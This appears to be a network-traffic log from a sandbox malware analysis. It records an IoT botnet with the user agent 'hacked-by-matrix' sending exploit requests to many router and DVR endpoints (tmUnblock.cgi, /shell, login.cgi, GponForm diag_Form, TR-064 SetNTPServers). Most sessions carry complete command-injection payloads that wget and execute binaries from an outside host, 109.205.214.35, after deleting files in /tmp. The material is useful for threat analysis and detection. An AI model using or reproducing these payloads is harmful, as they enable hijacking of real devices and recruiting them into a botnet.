                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1626192.168.2.1335762172.64.82.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.891064882 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1627192.168.2.1340048172.64.156.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.891141891 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1628192.168.2.1351398172.66.45.898080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.894535065 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1629192.168.2.1354770172.67.30.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.978543043 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1630192.168.2.1358140177.86.195.2980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:26.163817883 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:26.872370958 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:27.105887890 CET301INHTTP/1.1 200 OK
                                                        Content-Type:text/html
                                                        Pragma:no-cache
                                                        Cache-control:no-cache, no-store, max-age=0
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        X-XSS-Protection:1; mode=block
                                                        Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        Mar 21, 2024 05:23:27.105992079 CET1286INData Raw: 63 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: cb7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                        Mar 21, 2024 05:23:27.106046915 CET1286INData Raw: 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20
                                                        Data Ascii: return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv6A
                                                        Mar 21, 2024 05:23:27.106077909 CET731INData Raw: 65 73 73 56 61 6c 69 64 28 48 6f 73 74 49 6e 66 6f 29 29 0d 0a 7b 0d 0a 2f 2a 20 68 6f 73 74 20 73 74 72 69 6e 67 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 70 6f 72 74 20 2a 2f 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 73
                                                        Data Ascii: essValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;}else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan
                                                        Mar 21, 2024 05:23:28.496002913 CET731INData Raw: 65 73 73 56 61 6c 69 64 28 48 6f 73 74 49 6e 66 6f 29 29 0d 0a 7b 0d 0a 2f 2a 20 68 6f 73 74 20 73 74 72 69 6e 67 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 70 6f 72 74 20 2a 2f 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 73
                                                        Data Ascii: essValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;}else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1631192.168.2.13474121.94.68.13480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:26.615772009 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:28.493750095 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:28.852031946 CET313INHTTP/1.1 400 Bad Request
                                                        Server: CloudWAF
                                                        Date: Thu, 21 Mar 2024 04:23:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 153
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 57 41 46 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>CloudWAF</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1632192.168.2.1335562184.56.40.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:26.946926117 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1633192.168.2.134219890.183.166.13280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:27.472052097 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:27.653204918 CET441INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:27 GMT
                                                        Server: Apache/2.4.57 (CentOS Stream) OpenSSL/3.0.7
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1634192.168.2.1335630212.149.156.9480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:27.472543955 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:27.673650980 CET516INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:27 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 322
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 6f 67 75 73 5f 68 6f 73 74 5f 77 69 74 68 6f 75 74 5f 72 65 76 65 72 73 65 5f 64 6e 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at bogus_host_without_reverse_dns Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1635192.168.2.1342250213.176.57.7780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:27.626039028 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:27.783607960 CET307INHTTP/1.1 400 Bad Request
                                                        Server: WAF
                                                        Date: Thu, 21 Mar 2024 04:23:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 164
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 41 46 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>WAF</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1636192.168.2.1343562212.201.146.119443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:27.796284914 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1637192.168.2.1340252212.176.141.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:27.796309948 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1638192.168.2.1355334109.235.47.216443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:27.796344995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1639192.168.2.135771812.50.132.13180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:28.902642965 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:29.013592958 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:25:15 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                                        Mar 21, 2024 05:23:29.404912949 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:25:15 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1640192.168.2.1338858172.87.219.1697547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:28.950839996 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:33.040235043 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:39.180213928 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:51.212204933 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1641192.168.2.1344894174.20.41.147547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.073996067 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:29.207690001 CET132INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Date: Thu 21 Mar 2024 04:23:29 UTC
                                                        Server: lighttpd
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1642192.168.2.135922424.247.160.2347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.078983068 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
